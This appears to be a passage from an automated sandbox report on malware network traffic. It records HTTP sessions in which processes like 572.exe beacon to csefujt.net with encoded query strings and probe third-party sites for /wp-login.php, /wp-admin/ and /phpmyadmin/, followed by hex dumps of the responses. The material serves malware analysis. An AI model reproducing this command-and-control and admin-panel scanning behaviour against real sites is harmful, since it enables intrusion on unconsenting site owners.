                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                282192.168.2.656673181.4.228.15580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.872332096 CET186OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ventas.officeinsumos.com.ar
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.137789011 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/7.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.137799978 CET151INData Raw: 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                283192.168.2.656679185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.875741005 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.120047092 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                284192.168.2.656764162.241.203.3080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.966193914 CET176OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nossoplayer.me
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.073643923 CET226INHTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.074125051 CET218OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nossoplayer.me
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://nossoplayer.me/wp-login.php


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                285192.168.2.656810192.185.5.2380524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.035552025 CET218OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: multiideas.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://multiideas.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206428051 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=de3d28e45584db127222b7d93e7ba773; path=/
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec b2 6b 73 23 c9 95 25 f8 b9 d2 6c ff 83 57 c8 5a 95 39 4a 0f 84 3f c3 a3 8a a0 4c 55 ad de ee b1 66 8f 4c 8f 69 5b 53 c9 c6 40 20 92 88 aa 20 40 00 41 30 49 a9 fe fb 9e 73 3d 00 46 b2 52 a5 ec 69 cd ec ae d9 a6 31 1d 37 dc ef e3 dc 73 ce c5 e7 ff f8 df be f9 fd ff f5 9b 5f ab f5 70 db 5f be ba e0 8f ea 17 9b 9b 79 d1 6e f4 1f 7e 57 a8 65 bf 38 1c e6 c5 66 ab bf 3b 28 9c 87 e3 4d c1 c4 76 b1 c2 cf 6d 3b 2c d4 72 bd d8 1f da 61 5e fc e1 f7 ff a4 53 71 ba de 2c 6e db 79 71 ec da 87 bb ed 7e 40 a7 ed 66 68 37 48 7b e8 56 c3 7a be 6a 8f dd b2 d5 f2 f1 56 75 9b 6e e8 16 bd 3e 2c 17 7d 3b 37 6c d2 77 9b ef d5 be ed e7 c5 dd 7e fb ae eb db 42 ad f7 ed bb 79 31 9b dd dc de dd 94 db fd cd ec fd bb cd cc 30 fb d5 c5 61 b9 ef ee 86 cb d7 ef ee 37 cb a1 db 6e 5e 73 97 37 7f e6 59 ca 12 ff 06 3c 6a ae 3e bc 28 f7 ed 5d bf 58 b6 af 67 df 5e cb 8e df 5e cf de 7e f1 dd e1 8b 37 3f bc 79 bd da 2e ef 6f 01 b9 3c 05 bf ee 5b fe bc f9 ea 62 36 8e 7b 75 31 74 43 df 5e 5e dd f7 43 a7 fe 65 d5 2e 0e ea e7 3f 4b d6 98 af d4 7f bd 3f 0c 6a b1 d9 0e eb 76 af fe 7d bb 5f fd 66 df 1e 0e ea d0 0d ed c5 2c 97 4d b6 fc 62 b5 39 e8 3b 2c d8 0e cb f5 17 79 d5 2f 66 b3 77 60 ed 50 de 6c b7 37 7d bb b8 eb 0e e5 72 7b fb 85 9a 7d 42 e5 a1 7c 20 47 93 e4 17 3d 0f c3 62 e8 96 b9 e1 72 bf 3d 1c b6 fb ee a6 db e4 9e e8 07 c1 36 ed 72 78 31 ad 58 f4 43 bb df 2c 06 e8 31 3c de 41 e2 c5 dd 5d df 2d 17 24 7d b6 3f 1c 7e f1 fe b6 c7 13 f7 9b 17 1f f0 b2 5f ec ee b7 5f a9 7f 6a db d5 b3 96 b7 cc e8 98 40 24 b3 6e b3 6a df 97 77 eb bb d9 3b a4 cd 8a bf f7 f0 6f b6 b7 94 f0 f0 a9 28 96 63 fe 14 ce e7 5a ab df af bb 2c a5 ba 3f b4 07 05 8d d5 ff 29 22 a9 5f 6d 16 fd 23 88 3d a8 eb 47 75 b5 dd 1c 80 f8 5f 36 87 ee 66 8d a9 77 fd 3d 29 3e d6 65 5d 1a a5 d5 1f 0e dd e6 66 52 32 ec 17 cb ef 79 a5 d5 6c f6 f0 f0 50 de e6 06 dd d8 40 d0 29 ad 2f ff 8f 0c e3 df b6 43 fb e5 8f a6 00 1a 6c a7 96 f7 fb 3d b0 f7 8f 0a 52 be eb 6e ee f7 ed 4a 6d 37 00 3b 62 2f b1 46 9b b7 d8 3e 6c e0 d2 0d 96 04 88 ad 5a dc 63 a3 cd 40 66 5b f5 d0 0d eb 1f 6f d7 6d 64 eb 97 b3 0f ed 30 60 01 ac ba d8 b4 7d 49 ac 27 a8 ea 0f bf 02 92 55 cb 9c c9 0e b3 4f 62 4e f2 3f fb ec e2 b0 dc 77 77 c3 a8 fe d0 be 1f 66 df 2d 8e 8b 7c 5b 5c 22 e3 b3 07 a8 b7 7d 28 ff c7 c3 5d 7b bb fd ae fb dd 09 d0 5c fd b9 b8 5e 1c da 3f ec fb e2 cb 62 3d 0c 77 87 2f bf 9d 7d 3b 3b 94 0f e5 76 7f f3 ed ac bb 5d dc b4 87 6f a1 f9 be fd 76 26 c5 df ce 8c 29 6d 59 7d 3b ab ed fb da 7e 3b 2b de 16 98 89 fa f2 6e 73 83 8f c3 f1 e6 7f ae 1f 0a a5 1b 7e 7f 9d 1b 22 e2 f7 f6 7e bf 6c 8b 2f ff 5c 40 34 d2 cf b2 b1 bf b4 ff d0 aa df ce 1e ee 74 b7 59 f6 f7 2b 8e fa ee 20 17 52 a4 f7 6d 8f ac b6 bc ed 36 e5 77 87 5f 1e db fd 3c 94 a6 34 c5 0f 3f 7c 45 a2 3e 7f 77 bf 59 0e dd 76 f3 7a f1 f6 fa ed f2 cd 9f 4f df 6a c5 9b 37 7f 3e 2e f6 6a 39 ff dd 00 fb dd 94 ef f6 db db 6f d6 8b fd 37 50 f0 ab be 5c a2 f7 fe b7 ed 72 78 5d bd ad de 7e 5f 3e 74 ab 61 8d df 75 4b bd de bc ed cb
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1faaks#%lWZ9J?LUfLi[S@ @A0Is=FRi17s_p_yn~We8f;(Mvm;,ra^Sq,nyq~@fh7H{VzjVun>,};7lw~By10a7n^s7Y<j>(]Xg^^~7?y.o<[b6{u1tC^^Ce.?K?jv}_f,Mb9;,y/fw`Pl7}r{}B| G=br=6rx1XC,1<A]-$}?~__j@$njw;o(cZ,?)"_m#=Gu_6fw=)>e]fR2ylP@)/Cl=RnJm7;b/F>lZc@f[omd0`}I'UObN?wwf-|[\"}(]{\^?b=w/};;v]ov&)mY};~;+ns~"~l/\@4tY+ Rm6w_<4?|E>wYvzOj7>.j9o7P\rx]~_>tauK
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206442118 CET1286INData Raw: 77 5d df ff 1e 64 bd 5e 96 8b bb bb fe f1 35 7d f7 76 f1 06 e9 d5 9b af d8 7b 35 ff be 1c b6 ff b8 18 16 7f f8 ed bf be 7e f3 9f e8 7a 3d e9 da be e8 ba 6f 87 fb 3d 76 9a cf e7 ed 0f e7 15 db d7 8b bc e0 f5 57 dd bb d7 9f f7 7f f9 cb e7 cf cd df
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: w]d^5}v{5~z=o=vWWnX_%5+fE*{}%2wrlzz\oCL)6~l>x~?A96irocW}<k>I_d7z`_Jh>tu6ucPK
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206454992 CET1286INData Raw: db d2 7f 30 f7 ef 3d 4a df 76 37 fb c5 d0 96 b7 dd e6 79 ac 87 b7 a6 53 9f 4d 33 9b 2d ee ba f2 a1 dc ee 6f 66 5f fc 35 63 74 9b 55 fb be bc 5b df 71 f4 77 87 ed 66 96 25 3d b7 29 7e bd ea 86 3f fc f6 5f 8a bc 48 b1 b8 bb eb bb e5 62 e8 90 ba 3f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0=Jv7ySM3-of_5ctU[qwf%=)~?_Hb?~S7xBnIDYbCptA<7)fv^]BmpnZj~}{8PB0vP/~_U%~h1"/u~,i.I}?_?_
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206466913 CET1286INData Raw: 3e d2 70 5c 5a 7e 3f ca 37 dc 94 2f 0f cb 7d 77 37 a8 e1 f1 ae 9d 7f 31 b4 ef 87 d9 77 8b e3 22 df 7e 71 f9 6a f6 5f d4 c5 e7 7f fc e6 1f 7f f5 fb 5f fd 51 fd 97 d9 ab e3 62 af 86 07 b4 7e 3c b4 47 fc b4 ed e6 77 cb 3d ce df 8a c9 7f 8f 06 6a ae
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: >p\Z~?7/}w71w"~qj__Qb~<Gw=j\8oF-:Q<<}w-b-[}jno-."|[#-/z3@ogtYw.,/Prlv{]jr==^P4p}w4~/;
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206482887 CET1286INData Raw: 33 f4 26 48 39 f7 c4 fb 79 98 e0 49 f4 a4 32 b1 f4 b6 39 52 d8 86 62 b2 69 10 39 6b 83 b6 b6 0a 9c da 00 2a 2c 15 ec 5a 9b a6 4c a1 26 3e e0 17 7c 55 45 a7 61 1c 6d 17 6c 8d 09 36 1c 0d 1e 4c 82 d4 75 4c 34 82 c1 2c 7a 4b 4c 0c 28 70 ac aa 64 81
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3&H9yI29Rbi9k*,ZL&>|UEaml6LuL4,zKL(pd9f%4q^b1<9uru*c>Dsv&g'|E!UNgeZSy>:q*Alaaa;;h|C.XXF.JWy{*+
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206499100 CET1286INData Raw: 49 55 96 ce 8a bc 86 3c f4 3a c2 43 da d0 5a 62 7c 23 62 47 c1 e5 64 63 53 51 da da d9 71 1b 27 4e 85 42 4d 1a 7c 59 55 34 41 10 a7 72 8f 93 53 c1 37 cf 4a 36 16 5d b9 53 06 1e 4a 1f a8 20 9d 8d f1 75 2d 0a b2 da 04 12 b3 3b 95 c0 aa 23 6d 86 37
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: IU<:CZb|#bGdcSQq'NBM|YU4ArS7J6]SJ u-;#m7$;<$OULJ<lgG6CvQ;-I`XKGqMVdR3Ht3nsbX_o=n5/v-krYpMPv
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206510067 CET697INData Raw: ce eb 75 2c 8d 0d 3c ab 7a 07 e4 14 d4 8a a0 35 1f c6 d8 66 1e a1 66 4a b4 43 d3 98 21 4b 8b 27 ba 22 9f f9 46 9e 73 aa 9a c6 93 1c 35 a9 55 93 a6 6a 52 95 73 72 95 3a 65 66 33 9d 33 b1 b4 93 a5 05 a6 12 c8 bd 6c a4 e4 a4 31 a2 51 d3 53 96 ff 34
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: u,<z5ffJC!K'"Fs5UjRsr:ef33l1QS43coZ}i71i6N&^JEHW:&$M<'F8cE<%T^Zz\uO!j{AK \Mq7wSYx*:ZQ5
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206523895 CET1286INData Raw: 31 66 61 30 0d 0a a9 85 71 84 ba ca 17 99 be c8 9d 6a a1 ae 8e 09 19 0d 16 b1 a5 09 16 19 c1 87 01 1f 21 72 87 e8 fc 5a 43 43 9a 0d d9 b1 aa 55 05 7f 57 a9 d2 a2 a4 e8 52 bb dc 68 57 8d 63 f2 c8 3c 2c ea 3c 4b 32 b4 8c 52 32 4a e7 51 32 49 e7 49
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1fa0qj!rZCCUWRhWc<,<K2R2JQ2IIq91QShym#ipiPcMxxVZ7L?l]5yu(kw9Rs9f|JydxGIK"3M:p/xl%*!sX,#vw5
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206537008 CET1286INData Raw: ab 65 bf 38 1c e6 05 63 53 28 94 5d d9 ba f4 96 44 1c 2d e1 ec b8 88 8f fe 4c 68 aa fc a0 e5 27 f3 b7 d6 36 88 07 b4 e4 09 41 a9 1a f3 87 b3 0f 70 75 d4 63 c7 53 e6 f3 d3 30 a9 59 8f fd c6 24 35 99 35 4c 40 3c 9d 90 1a 5f a6 50 ff 7f 05 6d 28 6b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e8cS(]D-Lh'6ApucS0Y$55L@<_Pm(kzj?[7MeFXGN)C*A{!E saOV:UjPS96u:7S4I42cD0P$X!4MD_Va.lB@eU$Ux&;Sd
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.206547976 CET1286INData Raw: 73 8a 6d 8a 42 11 ee 38 cd 33 0b 16 3a 53 94 0d 24 44 72 fb 2c df 18 8b 1d 20 b7 2f 4d 55 ab 86 b9 94 0b ee ac f2 e6 64 86 c2 32 1e f2 87 ca 94 e4 2c 7e 70 8d f1 3e 0c e7 fc 00 45 a2 c0 b1 96 02 21 17 53 6a 62 f4 c0 12 91 41 8d 02 d5 80 ad cd a8
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: smB83:S$Dr, /MUd2,~p>E!SjbAm<w#!hzVO*[ghm(R+BT,teg|0u(JJe*z\=|Ej^=ZvzD{Z\ebRv3
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.308195114 CET1286INData Raw: 05 a9 d0 5c c7 84 d8 c6 44 75 d2 0e d0 4c 42 9b 2a 35 84 99 2a c4 26 d8 01 27 ec 84 9b e8 d6 be 74 a1 3e d6 dc 68 1d ca c6 c7 a3 2f c3 5a 23 8c fe d8 94 36 c0 e3 95 a8 8e 2a 03 ed 51 8d 55 f1 d5 38 0e 4b c9 e3 ac bd 01 20 1f 02 c7 07 e0 77 b2 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: \DuLB*5*&'t>h/Z#6*QU8K w.Os]~/"eh@k[6-g?jO:U{~PZhm29?Vo|4pZ#=Fc]h72.?tX|uU](]<]#S2F#@


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                286192.168.2.656863142.250.105.8480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.080317974 CET180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.217520952 CET485INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 183
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
